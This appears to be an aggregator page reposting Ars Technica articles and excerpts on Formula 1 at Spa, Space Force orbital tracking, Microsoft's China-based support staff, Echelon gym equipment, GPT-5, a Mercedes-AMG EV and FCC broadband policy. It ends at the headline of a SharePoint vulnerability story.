Author name: DJ Henderson

f1-in-belgium:-the-best-racetrack-in-the-world

F1 in Belgium: The best racetrack in the world


Changeable conditions usually make for exciting races, but 2025 was a bit dull.

Lewis Hamilton of Ferrari during the Formula 1 Belgian Grand Prix at Spa-Francorchamps in Spa, Belgium on July 27, 2025.

Does every race track have to have a ferris wheel now? For the record, Eau Rouge is the left-hand corner those cars are approaching—the corner at the top of the hill is Radillion. Credit: Jakub Porzycki/NurPhoto via Getty Images

Does every race track have to have a ferris wheel now? For the record, Eau Rouge is the left-hand corner those cars are approaching—the corner at the top of the hill is Radillion. Credit: Jakub Porzycki/NurPhoto via Getty Images

Formula 1 made its annual stop at Spa-Francorchamps, the historic track that winds its way through the hills and trees of the Ardennes. I’ll admit, I’d been waiting for this one; in fact, I’ve become somewhat of a Spa bore, having fallen in love with the place all over again a few weeks ago while attending the Crowdstrike 24-hour GT3 race.

The 4.3 mile (6.9 km) track delivers, whether that’s as a challenge to the drivers—corners like Eau Rouge, Raidillon, Pouhon, and Blanchiment are the equal of any. There’s elevation change, something that neither Monza nor Silverstone nor Montreal can offer. It has history, dating back well before the start of the Formula 1 world championship in 1949, albeit in a much longer, much scarier version that was truncated by more than half in 1979. The views are spectacular from almost anywhere you choose to watch from, and despite the track’s size, its a pleasant and easy walk through the forest paths (just as long as you can stop imagining that one scene from Band of Brothers).

The food and drink in the region are worth a visit by themselves, and architecture fans will enjoy the Belgians’ chaotic attitude toward planning permission and house renovations, which appears to boil down to “do whatever you like as long as it looks good and won’t fall down.” Pretty good driving roads in the area, too, although they get even better toward the Nürburgring, just over an hour away in Germany.

The other thing Spa has plenty of is weather. (Well, almost always; while it rained during practice for the 24 hour race last month, the race itself was completely dry. As was the Nürburgring 24 the weekend before. And the 24 Hours of Le Mans the week before that. Which scares me.) But there was weather aplenty for the 2025 Belgian Grand Prix.

Sprint weekend

This year Spa held a sprint weekend, significantly shortening the practice time available to teams, most of whom brought technical upgrades to the race. Sprint qualifying was determined by track evolution, with the surface getting grippier as more and more cars attempted to set fast times. Sauber rookie Gabriel Bortoleto in particular garnered some well-deserved attention for getting into SQ3, up among the very fastest cars, as did the Haas of Oliver Bearman (and his anything-but-a-rookie teammate Nico Hulkenberg).

McLaren’s Oscar Pastri secured the pole for the sprint race, lining up next to the Red Bull of Max Verstappen, a team now under the direction of Laurent Miekes after Red Bull’s corporate owners gave founding team principal Christian Horner his marching orders two weeks ago. As I wrote some months ago, for the past few years Red Bull’s design team has built cars that, while theoretically fast, are so difficult to drive at the limit that only Verstappen can exploit them properly. A single driver in the fastest car can win the driver’s championship, but if you want the team’s title—and that’s the one the bonuses are tied to, usually—then you better have both cars scoring good points. Just ask McLaren.

And Red Bull can no longer claim to have built the fastest car, even in Verstappen’s hands.

SPA, BELGIUM - JULY 26: Oscar Piastri of Australia driving the (81) McLaren MCL39 Mercedes leads Max Verstappen of the Netherlands driving the (1) Oracle Red Bull Racing RB21 Lando Norris of Great Britain driving the (4) McLaren MCL39 Mercedes and the rest of the field at the start during the Sprint ahead of the F1 Grand Prix of Belgium at Circuit de Spa-Francorchamps on July 26, 2025 in Spa, Belgium.

The grid negotiates the first corner—La Source—at the start of the sprint race. Credit: Clive Rose – Formula 1/Formula 1 via Getty Images)

That said, starting in second place at Spa is not so bad. After the slow hairpin of La Source—which McLaren has finally built a car able to cope with—there’s a long run to Les Coombes, with the challenge of Eau Rouge and Raidillon on the way. Verstappen got a good tow from the slipstream behind Piastri’s car along the Kemmel straight toward Les Coombes (isn’t it better when all the parts of the track have actual names and not just turn 1, turn 2, etc?) and got past, staying there in first place until the end, 15 laps later. Behind him, Ferrari’s Charles Leclerc did something similar to Piastri’s McLaren teammate, Lando Norris.

Although the Mclaren is a faster car than either the Red Bull or Ferrari, at Spa its speed came in the corners, and the orange cars were unable to close on or pass their rivals on the straights.

Teams and drivers faced a dilemma for Sunday’s race. They could either set their cars up for dry running, with less downforce and more top speed, or give them a higher downforce setup to capitalize on the rain. The thing is, they have to make that decision before qualifying on Saturday, then stick with it. Changes are allowed to setup, but only if you opt to start from the pitlane.

The McLarens took first and second in qualifying, with an amazing lap by Charles Leclerc that pipped Verstappen to third place by 3 milliseconds. Alex Albon got his Williams into a fine fifth place, and Red Bull’s other driver, Yuki Tsunoda—who has a much better relationship with Miekes than he ever did with Horner—made it into seventh just 0.3 seconds behind his otherworldly teammate. Bortotelo repeated his feat, snatching 10th in qualifying.

Not everyone had a good quali, particularly not Ferrari’s Lewis Hamilton, who was eliminated among the first drivers for the second time in two days, something the seven-time World Champion described as unacceptable. Mercedes’ young phenom, Kimi Antonelli, who replaced Hamilton, was also eliminated among the first batch, part of a miserable weekend for the Italian who just graduated from high school.

Race day

Sunday morning was greeted with plenty of rain, affecting the support races and then delaying the start of the Grand Prix. Formula 1 has both intermediate and wet grooved tires, which pump gallons of water into the air from the track at speed, creating huge clouds of visibility-obscuring spray that, at a place like Spa, just hang between the trees. It’s this lack of visibility, rather than the wet track itself, that makes F1 so cautious, and so the formation lap was held behind the safety car, at which point the race officials decided to red flag things and wait for some more rain to come through and then leave.

Aston Martin F1 Safety Car, Lando Norris and Oscar Piastri of McLaren during the Formula 1 Belgian Grand Prix at Spa-Francorchamps in Spa, Belgium on July 27, 2025.

The FIA was far too cautious in bringing in the safety car and getting the race started. Credit: akub Porzycki/NurPhoto via Getty Images

The race eventually began 90 minutes late and circulated behind the safety car for far longer than was necessary, given the emergence of a dry line before too long. The red flag gave plenty of drivers and teams the opportunity to tweak their setups for the rain—something that turned out to be the wrong move given the FIA’s reticence to throw the green flag.

Piastri, in second place behind Norris, did to his teammate what Verstappen had done to him the day before and snatched the lead well before Les Coombes, staying just far enough ahead of his closest rival for the championship throughout the race. A small mistake by Norris and a slightly slower pitstop from his team meant he never got close enough to challenge Piastri for the lead. Behind them, Verstappen was similarly unable to make his way past Leclerc.

Star of the race for me, and the viewers who voted him driver of the day, was Hamilton. Starting from the very back of the queue in the pitlane, Hamilton’s Ferrari was set up for wet weather, and yet again we saw the skills that have won him more F1 races than any other driver in history. Have you ever seen someone overtake at Stavelot? I might have, but only in Gran Turismo 7.

A key to Hamilton’s success was pitting for slick tires at the right time—lap 11, just ahead of almost everyone else—and the British driver finished in seventh place at the end, behind the low-downforce Williams of Albon.

The 2025 race will not rank high in the pantheon of Belgian Grands Prix in terms of a thrilling race, but if you’re a motorsport fan, you owe it to yourself to make it out there sometime. Did I mention the World Endurance Championship has a six-hour race there in May? The tickets are far cheaper than F1, and you get a lot more access, too.

Photo of Jonathan M. Gitlin

Jonathan is the Automotive Editor at Ars Technica. He has a BSc and PhD in Pharmacology. In 2014 he decided to indulge his lifelong passion for the car by leaving the National Human Genome Research Institute and launching Ars Technica’s automotive coverage. He lives in Washington, DC.

F1 in Belgium: The best racetrack in the world Read More »

ars-spoke-with-the-military’s-chief-orbital-traffic-cop—here’s-what-we-learned

Ars spoke with the military’s chief orbital traffic cop—here’s what we learned


“We have some 2,000 or 2,200 objects that I call the ‘red order of battle.'”

Col. Raj Agrawal participates in a change of command ceremony to mark his departure from Mission Delta 2 at Peterson Space Force Base, Colorado. Col. Barry Croker became the new commander of Mission Delta 2 on July 3.

For two years, Col. Raj Agrawal commanded the US military unit responsible for tracking nearly 50,000 human-made objects whipping through space. In this role, he was keeper of the orbital catalog and led teams tasked with discerning whether other countries’ satellites, mainly China and Russia, are peaceful or present a military threat to US forces.

This job is becoming more important as the Space Force prepares for the possibility of orbital warfare.

Ars visited with Agrawal in the final weeks of his two-year tour of duty as commander of Mission Delta 2, a military unit at Peterson Space Force Base, Colorado. Mission Delta 2 collects and fuses data from a network of sensors “to identify, characterize, and exploit opportunities and mitigate vulnerabilities” in orbit, according to a Space Force fact sheet.

This involves operating radars and telescopes, analyzing intelligence information, and “mapping the geocentric space terrain” to “deliver a combat-ready common operational picture” to military commanders. Agrawal’s job has long existed in one form or another, but the job description is different today. Instead of just keeping up with where things are in space—a job challenging enough—military officials now wrestle with distinguishing which objects might have a nefarious purpose.

From teacher to commander

Agrawal’s time at Mission Delta 2 ended on July 3. His next assignment will be as Space Force chair at the National Defense University. This marks a return to education for Agrawal, who served as a Texas schoolteacher for eight years before receiving his commission as an Air Force officer in 2001.

“Teaching is, I think, at the heart of everything I do,” Agrawal said. 

He taught music and math at Trimble Technical High School, an inner city vocational school in Fort Worth. “Most of my students were in broken homes and unfortunate circumstances,” Agrawal said. “I went to church with those kids and those families, and a lot of times, I was the one bringing them home and taking them to school. What was [satisfying] about that was a lot of those students ended up living very fulfilling lives.”

Agrawal felt a calling for higher service and signed up to join the Air Force. Given his background in music, he initially auditioned for and was accepted into the Air Force Band. But someone urged him to apply for Officer Candidate School, and Agrawal got in. “I ended up on a very different path.”

Agrawal was initially accepted into the ICBM career field, but that changed after the September 11 attacks. “That was a time with anyone with a name like mine had a hard time,” he said. “It took a little bit of time to get my security clearance.”

Instead, the Air Force assigned him to work in space operations. Agrawal quickly became an instructor in space situational awareness, did a tour at the National Reconnaissance Office, then found himself working at the Pentagon in 2019 as the Defense Department prepared to set up the Space Force as a new military service. Agrawal was tasked with leading a team of 100 people to draft the first Space Force budget.

Then, he received the call to report to Peterson Space Force Base to take command of what is now Mission Delta 2, the inheritor of decades of Air Force experience cataloging everything in orbit down to the size of a softball. The catalog was stable and predictable, lingering below 10,000 trackable objects until 2007. That’s when China tested an anti-satellite missile, shattering an old Chinese spacecraft into more than 3,500 pieces large enough to be routinely detected by the US military’s Space Surveillance Network.

This graph from the European Space Agency shows the growing number of trackable objects in orbit. Credit: European Space Agency

Two years later, an Iridium communications satellite collided with a defunct Russian spacecraft, adding thousands more debris fragments to low-Earth orbit. A rapid uptick in the pace of launches since then has added to the problem, further congesting busy orbital traffic lanes a hundred miles above the Earth. Today, the orbital catalog numbers roughly 48,000 objects.

“This compiled data, known as the space catalog, is distributed across the military, intelligence community, commercial space entities, and to the public, free of charge,” officials wrote in a fact sheet describing Mission Delta 2’s role at Space Operations Command. Deltas are Space Force military units roughly equivalent to a wing or group command in the Air Force.

The room where it happens

The good news is that the US military is getting better at tracking things in space. A network of modern radars and telescopes on the ground and in space can now spot objects as small as a golf ball. Space is big, but these objects routinely pass close to one another. At speeds of nearly 5 miles per second, an impact will be catastrophic.

But there’s a new problem. Today, the US military must not only screen for accidental collisions but also guard against an attack on US satellites in orbit. Space is militarized, a fact illustrated by growing fleets of satellites—primarily American, Chinese, and Russian—capable of approaching another country’s assets in orbit, and in some cases, disable or destroy them. This has raised fears at the Pentagon that an adversary could take out US satellites critical for missile warning, navigation, and communications, with severe consequences impacting military operations and daily civilian life.

This new reality compelled the creation of the Space Force in 2019, beginning a yearslong process of migrating existing Air Force units into the new service. Now, the Pentagon is posturing for orbital warfare by investing in new technologies and reorganizing the military’s command structure.

Today, the Space Force is responsible for predicting when objects in orbit will come close to one another. This is called a conjunction in the parlance of orbital mechanics. The US military routinely issues conjunction warnings to commercial and foreign satellite operators to give them an opportunity to move their satellites out of harm’s way. These notices also go to NASA if there’s a chance of a close call with the International Space Station (ISS).

The first Trump administration approved a new policy to transfer responsibility for these collision warnings to the Department of Commerce, allowing the military to focus on national security objectives.

But the White House’s budget request for next year would cancel the Commerce Department’s initiative to take over collision warnings. Our discussion with Agrawal occurred before the details of the White House budget were made public last month, and his comments reflect official Space Force policy at the time of the interview. “In uniform, we align to policy,” Agrawal wrote on his LinkedIn account. “We inform policy decisions, but once they’re made, we align our support accordingly.”

US Space Force officials show the 18th Space Defense Squadron’s operations floor to officials from the German Space Situational Awareness Centre during an “Operator Exchange” event at Vandenberg Space Force Base, California, on April 7, 2022. Credit: US Space Force/Tech. Sgt. Luke Kitterman

Since our interview, analysts have also noticed an uptick in interesting Russian activity in space and tracked a suspected Chinese satellite refueling mission in geosynchronous orbit.

Let’s rewind the tape to 2007, the time of China’s game-changing anti-satellite test. Gen. Chance Saltzman, today the Space Force’s Chief of Space Operations, was a lieutenant colonel in command of the Air Force’s 614th Space Operations Squadron at the time. He was on duty when Air Force operators first realized China had tested an anti-satellite missile. Saltzman has called the moment a “pivot point” in space operations. “For those of us that are neck-deep in the business, we did have to think differently from that day on,” Saltzman said in 2023.

Agrawal was in the room, too. “I was on the crew that needed to count the pieces,” he told Ars. “I didn’t know the significance of what was happening until after many years, but the Chinese had clearly changed the nature of the space environment.”

The 2007 anti-satellite test also clearly changed the trajectory of Agrawal’s career. We present part of our discussion with Agrawal below, and we’ll share the rest of the conversation tomorrow. The text has been lightly edited for brevity and clarity.

Ars: The Space Force’s role in monitoring activities in space has changed a lot in the last few years. Can you tell me about these changes, and what’s the difference between what you used to call Space Situational Awareness, and what is now called Space Domain Awareness?

Agrawal: We just finished our fifth year as a Space Force, so as a result of standing up a military service focused on space, we shifted our activities to focus on what the joint force requires for combat space power. We’ve been doing space operations for going on seven decades. I think a lot of folks think that it was a rebranding, as opposed to a different focus for space operations, and it couldn’t be further from the truth. Compared to Space Domain Awareness (SDA), Space Situational Awareness (SSA) is kind of the knowledge we produce with all these sensors, and anybody can do space situational awareness. You have academia doing that. You’ve got commercial, international partners, and so on. But Space Domain Awareness, Gen. [John “Jay”] Raymond coined the term a couple years before we stood up the Space Force, and he was trying to get after, how do we create a domain focused on operational outcomes? That’s all we could say at the time. We couldn’t say war-fighting domain at the time because of the way of our policy, but our policy shifted to being able to talk about space as a place where, not that we want to wage war, but that we can achieve objectives, and do that with military objectives in mind.

We used to talk about detect, characterize, attribute, predict. And then Gen. [Chance] Saltzman added target onto the construct for Space Domain Awareness, so that we’re very much in the conversation of what it means to do a space-enabled attack and being able to achieve objectives in, from, and to space, and using Space Domain Awareness as a vehicle to do those things. So, with Mission Delta 2, what he did is he took the sustainment part of acquisition, software development, cyber defense, intelligence related to Space Domain Awareness, and then all the things that we were doing in Space Domain Awareness already, put all that together under one command … and called us Mission Delta 2. So, the 18th Space Defense Squadron … that used to kind of be the center of the world for Space Domain Awareness, maybe the only unit that you could say was really doing SDA, where everyone else was kind of doing SSA. When I came into command a couple years ago, and we face now a real threat to having space superiority in the space domain, I disaggregated what we were doing just in the 18th and spread out through a couple of other units … So, that way everyone’s got kind of majors and minors, but we can quickly move a mission in case we get tested in terms of cyber defense or other kinds of vulnerabilities.

This multi-exposure image depicts a satellite-filled sky over Alberta. Credit: Alan Dyer/VWPics/Universal Images Group via Getty Images

We can’t see the space domain, so it’s not like the air domain and sea domain and land domain, where you can kind of see where everything is, and you might have radars, but ultimately it’s a human that’s verifying whether or not a target or a threat is where it is. For the space domain, we’re doing all that through radars, telescopes, and computers, so the reality we create for everyone is essentially their reality. So, if there’s a gap, if there’s a delay, if there are some signs that we can’t see, that reality is what is created by us, and that is effectively the reality for everyone else, even if there is some other version of reality in space. So, we’re getting better and better at fielding capability to see the complexity, the number of objects, and then translating that into what’s useful for us—because we don’t need to see everything all the time—but what’s useful for us for military operations to achieve military objectives, and so we’ve shifted our focus just to that.

We’re trying to get to where commercial spaceflight safety is managed by the Office of Space Commerce, so they’re training side by side with us to kind of offload that mission and take that on. We’re doing up to a million notifications a day for conjunction assessments, sometimes as low as 600,000. But last year, we did 263 million conjunction notifications. So, we want to get to where the authorities are rightly lined, where civil or commercial notifications are done by an organization that’s not focused on joint war-fighting, and we focus on the things that we want to focus on.

Ars: Thank you for that overview. It helps me see the canvas for everything else we’re going to talk about. So, today, you’re not only tracking new satellites coming over the horizon from a recent launch or watching out for possible collisions, you’re now trying to see where things are going in space and maybe even try to determine intent, right?

Agrawal: Yeah, so the integrated mission delta has helped us have intel analysts and professionals as part of our formation. Their mission is SDA as much as ours is, but they’re using an intel lens. They’re looking at predictive intelligence, right? I don’t want to give away tradecraft, but what they’re focused on is not necessarily where a thing is. It used to be that all we cared about was position and vector, right? As long as you knew an object’s position and the direction they were going, you knew their orbit. You had predictive understanding of what their element set would be, and you only had to do sampling to get a sense of … Is it kind of where we thought it was going to be? … If it was far enough off of its element set, then we would put more energy, more sampling of that particular object, and then effectively re-catalog it.

Now, it’s a different model. We’re looking at state vectors, and we’re looking at anticipatory modeling, where we have some 2,000 or 2,200 objects that I call the “red order of battle”—that are high-interest objects that we anticipate will do things that are not predicted, that are not element set in nature, but that will follow some type of national interest. So, our intel apparatus gets after what things could potentially be a risk, and what things to continue to understand better, and what things we have to be ready to hold at risk. All of that’s happening through all the organizations, certainly within this delta, but in partnership and in support of other capabilities and deltas that are getting after their parts of space superiority.

Hostile or friendly?

Ars: Can you give some examples of these red order of battle objects?

Agrawal: I think you know about Shijian-20 (a “tech demo” satellite that has evaded inspection by US satellites) and Shijian-24C (which the Space Force says demonstrated “dogfighting” in space), things that are advertised as scientific in nature, but clearly demonstrate capability that is not friendly, and certainly are behaving in ways that are unprofessional. In any other domain, we would consider them hostile, but in space, we try to be a lot more nuanced in terms of how we characterize behavior, but still, when something’s behaving in a way that isn’t pre-planned, isn’t pre-coordinated, and potentially causes hazard, harm, or contest with friendly forces, we now get in a situation where we have to talk about is that behavior hostile or not? Is that escalatory or not? Space Command is charged with those authorities, so they work through the legal apparatus in terms of what the definition of a hostile act is and when something behaves in a way that we consider to be of national security interest.

We present all the capability to be able to do all that, and we have to be as cognizant on the service side as the combatant commanders are, so that our intel analysts are informing the forces and the training resources to be able to anticipate the behavior. We’re not simply recognizing it when it happens, but studying nations in the way they behave in all the other domains, in the way that they set policy, in the way that they challenge norms in other international arenas like the UN and various treaties, and so on. The biggest predictor, for us, of hazardous behaviors is when nations don’t coordinate with the international community on activities that are going to occur—launches, maneuvers, and fielding of large constellations, megaconstellations.

A stack of Starlink satellites in space right before deployment

Starlink satellites. Credit: Starlink

There are nearly 8,000 Starlink satellites in orbit today. SpaceX adds dozens of satellites to the constellation each week. Credit: SpaceX

As you know, we work very closely with Starlink, and they’re very, very responsible. They coordinate and flight plan. They use the kind of things that other constellations are starting to use … changes in those elsets (element sets), for lack of a better term, state vectors, we’re on top of that. We’re pre-coordinating that. We’re doing that weeks or months in advance. We’re doing that in real-time in cooperation with these organizations to make sure that space remains safe, secure, accessible, profitable even, for industry. When you have nations, where they’re launching over their population, where they’re creating uncertainty for the rest of the world, there’s nothing else we can do with it other than treat that as potentially hostile behavior. So, it does take a lot more of our resources, a lot more of our interest, and it puts [us] in a situation where we’re posturing the whole joint force to have to deal with that kind of uncertainty, as opposed to cooperative launches with international partners, with allies, with commercial, civil, and academia, where we’re doing that as friends, and we’re doing that in cooperation. If something goes wrong, we’re handling that as friends, and we’re not having to involve the rest of the security apparatus to get after that problem.

Ars: You mentioned that SpaceX shares Starlink orbit information with your team. Is it the same story with Amazon for the Kuiper constellation?

Agrawal: Yeah, it is. The good thing is that all the US and allied commercial entities, so far, have been super cooperative with Mission Delta 2 in particular, to be able to plan out, to talk about challenges, to even change the way they do business, learning more about what we are asking of them in order to be safe. The Office of Space Commerce, obviously, is now in that conversation as well. They’re learning that trade and ideally taking on more of that responsibility. Certainly, the evolution of technology has helped quite a bit, where you have launches that are self-monitored, that are able to maintain their own safety, as opposed to requiring an entire apparatus of what was the US Air Force often having to expend a tremendous amount of resources to provide for the safety of any launch. Now, technology has gotten to a point where a lot of that is self-monitored, self-reported, and you’ll see commercial entities blow up their own rockets no matter what’s onboard if they see that it’s going to cause harm to a population, and so on. So, yeah, we’re getting a lot of cooperation from other nations, allies, partners, close friends that are also sharing and cooperating in the interest of making sure that space remains sustainable and secure.

“We’ve made ourselves responsible”

Ars: One of the great ironies is that after you figure out the positions and tracks of Chinese or Russian satellites or constellations, you’re giving that data right back to them in the form of conjunction and collision notices, right?

Agrawal: We’ve made ourselves responsible. I don’t know that there’s any organization holding us accountable to that. We believe it’s in our interests, in the US’s interests, to provide for a safe, accessible, secure space domain. So, whatever we can do to help other nations also be safe, we’re doing it certainly for their sake, but we’re doing it as much for our sake, too. We want the space domain to be safe and predictable. We do have an apparatus set up in partnership with the State Department, and with a tremendous amount of oversight from the State Department, and through US Space Command to provide for spaceflight safety notifications to China and Russia. We send notes directly to offices within those nations. Most of the time they don’t respond. Russia, I don’t recall, hasn’t responded at all in the past couple of years. China has responded a couple of times to those notifications. And we hope that, through small measures like that, we can demonstrate our commitment to getting to a predictable and safe space environment.

A model of a Chinese satellite refueling spacecraft on display during the 13th China International Aviation and Aerospace Exhibition on October 1, 2021, in Zhuhai, Guangdong Province of China. Credit: Photo by VCG/VCG via Getty Images

Ars:  What does China say in response to these notices?

Agrawal: Most of the time it’s copy or acknowledged. I can only recall two instances where they’ve responded. But we did see some hope earlier this year and last year, where they wanted to open up technical exchanges with us and some of their [experts] to talk about spaceflight safety, and what measures they could take to open up those kinds of conversations, and what they could do to get a more secure, safer pace of operations. That, at some point, got delayed because of the holiday that they were going through, and then those conversations just halted, or at least progress on getting those conversations going halted. But we hope that there’ll be an opportunity again in the future where they will open up those doors again and have those kinds of conversations because, again, transparency will get us to a place where we can be predictable, and we can all benefit from orbital regimes, as opposed to using them exploitively. LEO is just one of those places where you’re not going to hide activity there, so you just are creating risk, uncertainty, and potential escalation by launching into LEO and not communicating throughout that whole process.

Ars:  Do you have any numbers on how many of these conjunction notices go to China and Russia? I’m just trying to get an idea of what proportion go to potential adversaries.

Agrawal: A lot. I don’t know the degree of how many thousands go to them, but on a regular basis, I’m dealing with debris notifications from Russian and Chinese ASAT (anti-satellite) testing. That has put the ISS at risk a number of times. We’ve had maneuvers occur in recent history as a result of Chinese rocket body debris. Debris can’t maneuver, and unfortunately, we’ve gotten into situations with particularly those two nations that talk about wanting to have safer operations, but continue to conduct debris-causing tests. We’re going to be dealing with that for generations, and we are going to have to design capability to maneuver around those debris clouds as just a function of operating in space. So, we’ve got to get to a point where we’re not doing that kind of testing in orbit.

Ars: Would it be accurate to say you send these notices to China and Russia daily?

Agrawal: Yeah, absolutely. That’s accurate. These debris clouds are in LEO, so as you can imagine, as those debris clouds go around the Earth every 90 minutes, we’re dealing with conjunctions. There are some parts of orbits that are just unusable as a result of that unsafe ASAT test.

Photo of Stephen Clark

Stephen Clark is a space reporter at Ars Technica, covering private space companies and the world’s space agencies. Stephen writes about the nexus of technology, science, policy, and business on and off the planet.

Ars spoke with the military’s chief orbital traffic cop—here’s what we learned Read More »

microsoft-to-stop-using-china-based-teams-to-support-department-of-defense

Microsoft to stop using China-based teams to support Department of Defense

Last week, Microsoft announced that it would no longer use China-based engineering teams to support the Defense Department’s cloud computing systems, following ProPublica’s investigation of the practice, which cybersecurity experts said could expose the government to hacking and espionage.

But it turns out the Pentagon was not the only part of the government facing such a threat. For years, Microsoft has also used its global workforce, including China-based personnel, to maintain the cloud systems of other federal departments, including parts of Justice, Treasury and Commerce, ProPublica has found.

This work has taken place in what’s known as the Government Community Cloud, which is intended for information that is not classified but is nonetheless sensitive. The Federal Risk and Authorization Management Program, the US government’s cloud accreditation organization, has approved GCC to handle “moderate” impact information “where the loss of confidentiality, integrity, and availability would result in serious adverse effect on an agency’s operations, assets, or individuals.”

The Justice Department’s Antitrust Division has used GCC to support its criminal and civil investigation and litigation functions, according to a 2022 report. Parts of the Environmental Protection Agency and the Department of Education have also used GCC.

Microsoft says its foreign engineers working in GCC have been overseen by US-based personnel known as “digital escorts,” similar to the system it had in place at the Defense Department.

Nevertheless, cybersecurity experts told ProPublica that foreign support for GCC presents an opportunity for spying and sabotage. “There’s a misconception that, if government data isn’t classified, no harm can come of its distribution,” said Rex Booth, a former federal cybersecurity official who now is chief information security officer of the tech company SailPoint.

“With so much data stored in cloud services—and the power of AI to analyze it quickly—even unclassified data can reveal insights that could harm US interests,” he said.

Microsoft to stop using China-based teams to support Department of Defense Read More »

echelon-kills-smart-home-gym-equipment-offline-capabilities-with-update

Echelon kills smart home gym equipment offline capabilities with update

Some might never have purchased Echelon equipment if they knew the machines might one day fail to work without a web connection or Echelon account.

Third-party app connections severed

For some owners of Echelon equipment, QZ, which is currently rated as the No. 9 sports app on Apple’s App Store, has been central to their workouts. QZ connects the equipment to platforms like Zwift, which shows people virtual, scenic worlds while they’re exercising. It has also enabled new features for some machines, like automatic resistance adjustments. Because of this, Viola argued in his blog that QZ has “helped companies grow.”

“A large reason I got the [E]chelon was because of your app and I have put thousands of miles on the bike since 2021,” a Reddit user told the developer on the social media platform on Wednesday.

However, Echelon’s firmware update likely seeks to regain some of the revenue opportunities that overlap with the capabilities that apps like QZ enable. Echelon’s subscription-based app, which starts at $40 per month, also offers “guided scenic rides,” for example. QZ can allow people to watch Peloton classes from their Echelon device, but Echelon sells its own fitness classes. The Tennessee-headquartered company has been investing in ways to get customers more engaged with its personalized workout platform, too, which requires the machines to be online.

There’s also value in customer data. Getting more customers to exercise with its app means Echelon may gather more data for things like feature development and marketing.

Echelon is a private company, and we don’t know how much money it is making, but it’s likely that its financial goals hinge on subscription sales, which can generate more revenue than expensive equipment purchases. Meanwhile, Echelon is competing with other tech-centric companies offering gym equipment and classes, like the Peloton.

Viola runs QZ, which costs $7 to $8 to download, alone, offering users a lot of support via online communities. He told Ars that revenue from app purchases covers his costs “more or less.”

“It was never my intention to damage anyone’s business. This is just competition. The best product should prevail,” Viola said. “I never created QZ to get rich; I just wanted users to have a great hour of fitness when they choose, without connection issues, subscriptions, or [other limitations].”

In terms of QZ, the user community is “working on a fully open-source Echelon controller to unlock bikes that have already received this update,” per Viola. It’s in the very early stages, he said.

Echelon kills smart home gym equipment offline capabilities with update Read More »

openai’s-most-capable-ai-model,-gpt-5,-may-be-coming-in-august

OpenAI’s most capable AI model, GPT-5, may be coming in August

References to “gpt-5-reasoning-alpha-2025-07-13” have already been spotted on X, with code showing “reasoning_effort: high” in the model configuration. These sightings suggest the model has entered final testing phases, with testers getting their hands on the code and security experts doing red teaming on the model to test vulnerabilities.

Unifying OpenAI’s model lineup

The new model represents OpenAI’s attempt to simplify its increasingly complex product lineup. As Altman explained in February, GPT-5 may integrate features from both the company’s conventional GPT models and its reasoning-focused o-series models into a single system.

“We’re truly excited to not just make a net new great frontier model, we’re also going to unify our two series,” OpenAI’s Head of Developer Experience Romain Huet said at a recent event. “The breakthrough of reasoning in the O-series and the breakthroughs in multi-modality in the GPT-series will be unified, and that will be GPT-5.”

According to The Information, GPT-5 is expected to be better at coding and more powerful overall, combining attributes of both traditional models and SR models such as o3.

Before GPT-5 arrives, OpenAI still plans to release its first open-weights model since GPT-2 in 2019, which means others with the proper hardware will be able to download and run the AI model on their own machines. The Verge describes this model as “similar to o3 mini” with reasoning capabilities. However, Altman announced on July 11 that the open model needs additional safety testing, saying, “We are not yet sure how long it will take us.”

OpenAI’s most capable AI model, GPT-5, may be coming in August Read More »

mercedes-amg-gives-us-a-ride-in-its-next-high-performance-ev

Mercedes-AMG gives us a ride in its next high-performance EV

The first thing I noticed was the simulated engine noise. It was developed to be unique to AMG.EA, taking inspiration from some of the great AMGs of the past. AMG boss Michael Schiebe tells us that they set up shop outside the offices and had people drive by in various cars to find the right engine and exhaust notes to fit into the creation. It’s a deep, throaty sound.

It’s a sound you can feel

Seriously, I feel something in my seat. The engineer later asks if I notice anything in my seat, and while I can’t confirm what it was adding to the sound—be it a speaker or a motor—it does help make the car feel more alive.

The artificial gearshifts are more than just halting power for a brief period; they’re part of a mapped-out torque curve. Like in the Hyundai, you can feel the acceleration build like you would in a combustion engine. It’s not as prominent as in the Hyundai, but it’s there.

When the car shifts, it feels a lot like a ZF 8-speed automatic in a modern performance car. It’s smooth, but enthusiastic. It’s not as extreme as the Hyundai, but I’d argue the Hyundai driver and the AMG driver are looking for a different experience, with the AMG being a bit more adult.

The AMG also, at least as it sits now, will automatically upshift at redline. The fun thing about the Hyundai is, if you intentionally miss a shift, the car will throw your head into the steering wheel as you hit the artificial rev limiter. It’s hilarious. The vibe from the prototype I’m in is that things are a bit more serious.

Mercedes-AMG gives us a ride in its next high-performance EV Read More »

fcc-to-eliminate-gigabit-speed-goal-and-scrap-analysis-of-broadband-prices

FCC to eliminate gigabit speed goal and scrap analysis of broadband prices

“As part of our return to following the plain language of section 706, we propose to abolish without replacement the long-term goal of 1,000/500Mbps established in the 2024 Report,” Carr’s plan said. “Not only is a long-term goal not mentioned in section 706, but maintaining such a goal risks skewing the market by unnecessarily potentially picking technological winners and losers.”

Fiber networks can already meet a 1,000/500Mbps standard, and the Biden administration generally prioritized fiber when it came to distributing grants to Internet providers. The Trump administration changed grant-giving procedures to distribute more funds to non-fiber providers such as Elon Musk’s Starlink satellite network.

Carr’s proposal alleged that the 1,000/500Mbps long-term goal would “appear to violate our obligation to conduct our analysis in a technologically neutral manner,” as it “may be unreasonably prejudicial to technologies such as satellite and fixed wireless that presently do not support such speeds.”

100/20Mbps standard appears to survive

When the 100/20Mbps standard was adopted last year, Carr alleged that “the 100/20Mbps requirement appears to be part and parcel of the Commission’s broader attempt to circumvent the statutory requirement of technological neutrality.” It appears the Carr FCC will nonetheless stick with 100/20Mbps for measuring availability of fixed broadband. But his plan would seek comment on that approach, suggesting a possibility that it could be changed.

“We propose to again focus our service availability discussion on fixed broadband at speeds of 100/20Mbps and seek comment on this proposal,” the plan said.

If any regulatory changes are spurred by Carr’s deployment inquiry, they would likely be to eliminate regulations instead of adding them. Carr has been pushing a “Delete, Delete, Delete” initiative to eliminate rules that he considers unnecessary, and his proposal asks for comment on broadband regulations that could be removed.

“Are there currently any regulatory barriers impeding broadband deployment, investment, expansion, competition, and technological innovation that the Commission should consider eliminating?” the call for comment asks.

FCC to eliminate gigabit speed goal and scrap analysis of broadband prices Read More »

sharepoint-vulnerability-with-9.8-severity-rating-under-exploit-across-globe

SharePoint vulnerability with 9.8 severity rating under exploit across globe

The researchers wrote:

